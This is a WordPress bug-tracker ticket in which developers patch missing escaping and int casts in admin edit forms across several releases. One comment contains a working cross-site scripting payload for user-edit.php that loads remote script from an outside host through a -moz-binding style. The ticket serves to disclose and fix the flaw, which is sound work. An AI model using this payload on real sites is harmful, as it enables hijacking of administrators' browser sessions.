Ticket #4333 (closed defect: fixed)

Opened 1 year ago

Last modified 1 year ago

Some attribute_escape()s and relatives for edit forms

Reported by: mdawaffe Assigned to: anonymous
Priority: high Milestone: 2.2.1
Component: Administration Version: 2.2
Severity: normal Keywords:
Cc:

Description

http://ha.ckers.org/blog/20070524/wordpress-vulns/

Attached

Attachments

4333.diff (19.3 kB) - added by mdawaffe on 05/24/07 21:47:15.
UserEdit_Fix_Trunk.patch (0.6 kB) - added by g30rg3x on 05/26/07 05:31:02.
User-Edit.php Fix for trunk
Fix_22.patch (17.5 kB) - added by g30rg3x on 05/27/07 04:59:37.
Patch for milestone 2.2, based on trunk chageset #5543

Change History

05/24/07 21:47:15 changed by mdawaffe

  • attachment 4333.diff added.

05/24/07 22:00:34 changed by ryan

The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.

05/24/07 22:06:42 changed by rob1n

  • owner changed from anonymous to rob1n.

Also, looks like we could use some selected()'s in there.

05/25/07 09:41:05 changed by ryan

(In [5543]) attribute_escape()s and int casts. see #4333

05/25/07 14:46:12 changed by rob1n

  • status changed from new to closed.
  • resolution set to fixed.

Looks like those <select>'s options aren't going to work with selected().

05/25/07 21:04:24 changed by markjaquith

  • status changed from closed to reopened.
  • resolution deleted.
  • milestone changed from 2.3 to 2.2.1.

Also needs to go into 2.2.1 and 2.0.11

05/25/07 22:33:48 changed by markjaquith

(In [5550]) attribute_escape()s and int casts for 2.0.x: see #4333

05/25/07 22:36:26 changed by markjaquith

2.2.1 remains.

05/26/07 05:28:44 changed by g30rg3x

Well i make some trunk based patches for 2.2.
Obviously i don't add anything that has to be related with the trunk version.

Also i think that the trunk solution is incomplete because doesn't filter the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'

05/26/07 05:31:02 changed by g30rg3x

  • attachment UserEdit_Fix_Trunk.patch added.

User-Edit.php Fix for trunk

05/27/07 04:59:37 changed by g30rg3x

  • attachment Fix_22.patch added.

Patch for milestone 2.2, based on trunk chageset #5543

05/28/07 19:47:21 changed by rob1n

  • owner changed from rob1n to anonymous.
  • status changed from reopened to new.

05/29/07 04:35:23 changed by markjaquith

(In [5588]) use clean_url(). Nice catch, g30rg3x. see #4333 for trunk

05/29/07 04:37:36 changed by markjaquith

  • status changed from new to closed.
  • resolution set to fixed.

(In [5589]) Int casting and misc escaping for 2.2 Props g30rg3x. fixes #4333 for 2.2